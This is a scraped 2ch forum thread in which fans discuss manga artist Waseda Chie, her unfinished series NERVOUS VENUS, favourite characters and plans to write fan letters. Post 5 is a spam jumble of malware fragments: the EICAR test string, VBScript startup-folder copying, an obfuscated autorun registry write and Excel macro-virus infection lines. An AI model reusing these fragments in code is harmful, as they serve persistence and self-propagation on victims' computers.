1read 100read
2012年09月少女漫画138: 早稲田ちえ・2・NERVOUS VENUS (805) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【チッチ】小さな恋のものがたり【サリー】11 (902)
★☆魔夜峰央についてかたりましょう☆★Part52★ (624)
結婚してる少女漫画家・してない少女漫画家 (233)
少女漫画のむかつくヒーロー5 (247)
【黒糖チュロス】美川べるのPart60【尻R首】 (872)
りぼんの漫画について Part.206 (214)

早稲田ちえ・2・NERVOUS VENUS


1 :2007/04/25 〜 最終レス :2012/10/29
早稲田ちえ先生について語りましょう
代表作
NERVOUS VENUS 全6巻(現在進行形)
純情事情ー春と修羅ー
ー女神ー(文庫短編集)

2 :


3 :
ついに2に!


4 :
>>1乙!

5 :
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub

6 :
乙です!

7 :
あげとく

8 :
待ってるよー

9 :
本当に今何やってるんだろうか?

10 :
元気でいてくれれば…あと一年に一度でよいからNVの続きを…!

11 :
早咲きの天才って面では、岡田あーみんと通じるものがあるんだよね、早稲田さん。
あーみんは引退しちゃったけど、早稲田さんの復帰はまだ長い目で期待したいな。

12 :
2スレ目たってるー!乙です!
本当続きがみたいよ、NV
神ちゃん好きだああああ

13 :
え?NVって「全」6巻なの!?
続きはまだなのか…orz
てか早稲田先生の近況が知りたいよ…。

14 :
前スレ読みたい…

15 :
●を買うしかないね。
もし、janeを使ってるんだったら、datを上げてあげても良いよ。

16 :
読みてー

17 :
口コミで広がっていけー
んで早稲田先生復活
んでNV続編発売!
になればいいな……

18 :
そもそも早稲田先生はお元気にしてるんでしょうか?
もうずっと漫画掲載してないですよね?
私、見落としてるかな…?
小学生の頃からずっと好きな漫画家だから、絶対復活して欲しい!
どっかに現在の早稲田先生の情報ないのかな?

19 :
早稲田さんどこーーー?

20 :
>>15 ありがとう、そのやさしさだけいただいておきます。
残念ながらマカーなので…

21 :
>>20
ここに前スレのログがあったんで貼っておきます。
ttp://p2.chbox.jp/read.php?url=http://anime2.2ch.net/test/read.cgi/gcomic/1100605256/all

22 :
>>21
ありがとう!
あとでじっくり読むことにする〜

23 :
久しぶりに全巻読んだら続きが気になって仕方無い。
太閤とハルはどうなったのだろう?
関を幸せにしてやって欲しかったな。

24 :
>>21
ありがとう。
全部読んだよ。そして持ってる単行本も読み直したw
海野つなみ先生のブログ読んできて、ちょっとだけ安心したよ。
気長ーーーーーーに待つことにします。
てか自分、早稲田ちえの単行本全部持ってると思ってたのに、純情事情だけ持ってないことに気付いた!!
読む楽しみができたぞー!
今から買ってくる!

25 :
実際引退しちゃったんじゃないかな…(..)
本当に寂しい。
今どうしてるのか報告だけでもしてほしいな

26 :
>>25
海野つなみ 早稲田ちえでググれ。
一応まだ漫画描いてるみたいだから。
今年中に1冊、出してくれー。

27 :
海野つなみさんのブログのことだよね
ググッてみたけど今も漫画描いてるなんて情報あった?

28 :
コメントのとこに少しだけど書いてあるよ。

29 :
なんかこのスレの皆のあたたかい言葉たち早稲田先生に届けたいな…
ちなみに、ファンレターとかは講談社あてでよかったのだろうか。
最近引っ越して、まだ早稲田先生のマンガは持ってきてないのだー
誰か分かる人いたら教えて欲しい…

30 :
「講談社 なかよし編集部気付 早稲田ちえ様」でOKかと。

31 :
N.V.6巻の巻末には、
講談社なかよし編集部「NERVOUS VENUSE」係ってなってるよー。

32 :
おっと、リロードしてなかった。
6巻出てから大分たってるし(泣)、>>30の方がよさげだね。
私も書こうかなー。
このスレのおかげで、早稲田ちえ熱が再燃。

33 :
>>30
>>31
ありがとう!
今度書いてみる。
それが連載再開のきっかけになってくれればいいな。

34 :
私も書こうかなー…。絶対復活!な感じじゃないんだけど、書けるんだったらチキ子ちゃんみたいな短編でも十分嬉しい。

早稲田先生ってマイナーかと思ってたんだけど、知ってる人は知ってるんだよね。5巻出た時ロフト本屋の売り上げ3位になってて驚いた。週間かは忘れたけど、あれは嬉しかった。

35 :
ここの住人が本気でファンレ書くなら
自分もそれ支援しますよ。
早稲田先生復活は何より心待ちです。

36 :
ファンレター書くのを支援するって何するの?w
一緒に書くよってこと?

37 :
>>36そう言うこと
一通でも多いほーが可能性上がるでしょ
まぁ引退しちゃってたら元も子もないけどね

38 :
さっきこのスレを発見して、
感動のあまり前スレから全部読んだ…。
みんな早稲田先生が大好きなのね。
ここ数年は、
本屋に行く度に、新刊が出ていないかとチェックしてしまいますorz

39 :
>>37
確かに手紙多い方が、待ってる人がいるんだよってアピールになるね。
そういう自分は31な訳だが、先生にプレッシャーかけないような内容で
ファンレター出そうと思っております。
引退はしていないはず!と信じて。

40 :
なんか、あったかいな
ファンレター書こう…
とりあえず、ファンレターって書いたことないんだが…何を書くものなんだ?普通は…

41 :
なに書こう?
私も出したことないから分からん。
昔から好きです、とか作品の感想とかかな?

42 :
もうだいぶ前の事だけど、ファンレター書いたら2年後くらいに返事きたよ

43 :
mixiの早稲田コミュも結構似た様な流れ
筆は捨ててないようだ

44 :
>>43
mixiにコミュあったんだ。
知らなかった。
とりあえず早稲田作品に出てくる要ちゃんは意外と好き

45 :
mixi見れないから友達に紹介状もらってきます!!

46 :
早稲田先生が再び第一線に戻ってきますように☆
早稲田ちえと出会ってもう十年以上経ちます。
まさか、先生が今の状態になる事は
想像もしてなかったけど…(泣)
読み切りでもいいから、定期的に描いて欲しいよぉ〜!

47 :
何だかずっと同じ流れなのでここらで雑談を。早稲田ネタ話せるのここだけだしorz
1位 関
2位 西田
3位 雅嗣
4位 マリア
5位 神ちゃん
個人的好きなキャラランキング。なんというか全体的にゲッヒンズ。みなさんはいかが。

48 :
私は1位関2位ひーちゃんの彼氏(名前忘れたw)かな?

49 :
>>48
鼎(カナエ)くんだよね

50 :
鼎ってひーちゃんをいきなり押し倒してキスした奴?
あれがもしキモオタだったら絶対話成立しないよね

51 :
少女マンガだからね
っていうか、むしろキモオタにはそんな行動力はないと思う

52 :
勘違いブサイコだったら行動力ありそう

53 :
あれは鼎くんの男前っぷりと、せいちゃんの変な前フリ(年下にガツーン!燃えるぜwみたいな)があったから成り立ってるわけで
行動力あるブサ男でも後には続かないと思う。そんな場面あったらひーちゃんの悲劇的なエピとして暗く描かれそうw

54 :
ひどいブサオタ避難www
1位 若き頃の関(2巻)
2位 神ちゃん
3位 櫻
2巻びいきwwwww

55 :
>53
あれが許されるのは早稲田さんの漫画の力量だろうね
>デフォルメ効いた現実味のない絵と話の勢い
デッサンが取れてるオーソドックスな絵、普通のテンポでやられたら
いくら少女漫画でイケメンでも「セクハラ!」って叩かれる行為だよ

56 :
>53
確かに考えてみればかなりセクハラかも。
でもその後のひーちゃんの錯乱っぷりが凄かったから、なんかすんなり流してたよw

キャラは関か高塚くん(熱視線)が好きかなー。

57 :
私はひーちゃんとれーちゃんとたいこーが好きだ!!!
でもたいこーは報われないような気がする…

58 :
たいこーは当て馬だろーね
報われないよきっと。
まぁ報われないと言えば自分らもだけどね
作者に片思いして数年間放置状態だからね今

59 :
涙でてきた…

60 :
新刊出ないの?

61 :
>>60そんか噂があればここも近所のお祭り程度には賑わってると思うよ
新刊の前に連載すら…

62 :
噂でもいいから盛り上がりたい…
っていうか、話題に飢えてるうちらwww

63 :
とりあえず本編を完結させてくれさえすれば…。
サイドストーリーは余力があれば描くぐらいでよかったのに。
いや、もうね、セキ兄やひーちゃんや神ちゃんの過去などなど、
そんなものはどーでもいいってぐらいの勢いで、
セキ&ハルの今後が気になるんですよ。

64 :
風呂敷広げすぎて、どうしまえばいいかわかんなくなったとかはちょっと
どうくっつけるのあの二人…あれだけハルが関のこと嫌い嫌い言ってて…

65 :
確かに早稲田だったら、結局くっつかず終わる可能性も高いな

66 :
高慢チキ子ちゃん収録の体験チキ子P171で
女の子が言った言葉に反応した早稲田さんはなんで驚いてるんですか?
分からない...orz
誰か教えてください

67 :
多分女の子が言った言葉を10回繰り返してみるとわかるかも。
違うかな。自分も自信ないや。

68 :
>>66-67
手元になくて、すぐに確認できない…

69 :
R

70 :
要するに、あの女の子のお母さんが「高慢」と「コー○ン」を聞き間違えたってことです。
「コー○ン」というのは要するに「高慢」を繰り返して読めば分かるでしょう。
そういうことなので、女の子の言葉には嬉しい意味の驚きで、お母さんの言葉には
恥ずかしい意味の驚きということになります。
しかし、こんな解説をする私も恥ずかしいよw

71 :
なるほろ
66じゃないが納得

72 :
>>70
ありがとう。
なるほど、そういうことだったんだ。
この言葉は大きな声で言わない方がいいですね。

73 :
早稲田ちえの熱烈ファンが他にも居るって
知れただけでも、このスレの存在意義があると思う。
私の回りには知ってる人居ないから、
このスレ、かなりありがたいです。
久しぶりに古本屋で手に取って見てみたけど、
やっぱ、絵柄の線は細いなぁ(笑)
本人もそこは欠点として挙げてたけど、
でも、それが彼女の個性でもあったりして。
読み切りでもいいから、描いてくれ〜泣

74 :
描いて

75 :
3巻で関は保健の先生とヤッたの?

76 :
>>75
2巻で音楽の先生、じゃなくて?

77 :
教室で関がハルにキスしたって告白してハルがキレた後関保健室に行ったんだけど帰り関のシャツが乱れてたから

78 :
俺もそれ気になる

79 :
なんかそれっぽい雰囲気にはなったけど、事に至ってはいないと推測…。
でも男子高校生にそんなブレーキかけられるような理性はないのかなー?

80 :
手元になくて確認できない…その2

81 :
音楽の先生とは確実に有りで、
保険の先生とはおそらく無いと思う。


82 :
別スレで「○○さん(断筆してたマンガ家さん)が○年振りに復活キター!」ってのを見て、
『早稲田さんも…早稲田さんも復活してくれ…るかなorz』
と凹み&希望を抱いた自分がいる。
私はあのほっそい線は早稲田さんの魅力だと思ってる。
あんなほっそいシャープな線のマンガ家ってなかなかいない気がする。細くてふわふわな線のマンガ家なら割といそうだけど。
頼むからナーバスビーナスだけでも完結させてください…。

83 :
>>77
よく見たら関のシャツは元から大きく開いてた。多分拒否って慌ててきたって感じだね

84 :
普通にやっちゃったんじゃない?
その方が話的に自然だと思ってたけど

85 :
ええーハルと出会った関にはそんなことして欲しくない

86 :
でも関、他の人となら何回でもできるし誰とでもできるけどハルとはできないって意味深なこと言ってたよね…

87 :
関って誰とでも何回でもできるようなRは、くだらないと思ってるというか、
ちょっとした嫌悪感すら持ってそうな気がするんだけど。
こう書くと女の子みたいだけどw、やっぱ保健の先生とはしてない気がする。

88 :
1番初めに見たせいか、家族のモンダイが好き。
カップルもいいし、脇の三姉妹がイイ!
こういう胸キュンな話って、最近ないよね。

89 :
>>47
わりと皆好きだけど
1位、神ちゃん
2位、鼎くん
3位、高塚くん
4位、由貴(家庭教師の)
5位、関&たいこー
脇キャラにハマりやすい体質

90 :
http://www.yahoo.co.jp/

91 :
え、保険の先生とはやってると思ってた。
じゃなきゃあんな意味深な描き方しないと思う

92 :
私はやってない派かな。他の女は何もしないでも寄ってくるのに、何で好きな女とは上手くいかないんだろう苛々。ってだけの描写かと思ってた。
胸元もだるいから開けたのかとw

なんか解釈色々あって不思議というか面白いな。

93 :
久々に最後の楽園読んで自分は当時の早稲田せんせーより年上になってるかもと思った。

94 :
…ちなみに早稲田先生はいくつなのだろう

95 :
デビューは高校生くらいかな?

96 :
デビューは中学生でしょ?15歳。
だから…今30代半ば?

97 :
mjd!!!!
すげー!
知らなかった。情報さんくすこ

98 :
少女漫画ってデビュー早い人多いもんね。
30代半ばなんて、まだまだ働き盛りでしょー。
復帰、して…。

99 :
結婚したの?

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
【マーガレット】吉住渉6【りぼん】 (324)
【読経しちゃうぞ!】絹田村子【さんすくみ】 (651)
樹なつみについて語ろう phase31 (610)
少女漫画板自治スレッド 6 (818)
【 運 命 】♂刑部真芯♀ 21ループ目【<コ:彡ループ】 (975)
死ぬほど嫌いな少女漫画と作者を書き殴るスレPart.3 (820)
--log9.info------------------
【原点回帰】WinはMacのパクリだろ? (324)
Appleが先端だったのに開発止めた謎 (531)
【傾向】マク板最萌トーナメントッ!【対策】 (227)
Mac miniはMacintosh LCの後継者か? (214)
cube合掌 (391)
躁鬱躁鬱躁鬱   EXPO実況!   躁鬱躁鬱躁鬱 (214)
菊地桃子祭り (272)
誰か俺にMacを勧めてくれ! (364)
 なげやり〜なマカーの一日  (365)
【頭文字D】OS8.6【はちろく】 (864)
旧・Mac板自治スレッドX (261)
外部記憶装置 (240)
マカーおやすみ前のひとこと (210)
マァァッッケントォォォーーーッシ!! (336)
マックとwinを共有して使う方法 (301)
みんなMac買ってなにやってんの? (210)
--log55.com------------------
火曜サプライズ Part3
有田ジェネレーション part4
☆★松本家の休日★★
芸能人が本気で考えた!ドッキリGP Part1
ダウンタウンなうPart18
ナニコレ珍百景 Part14
IPPONグランプリ Part21
news zero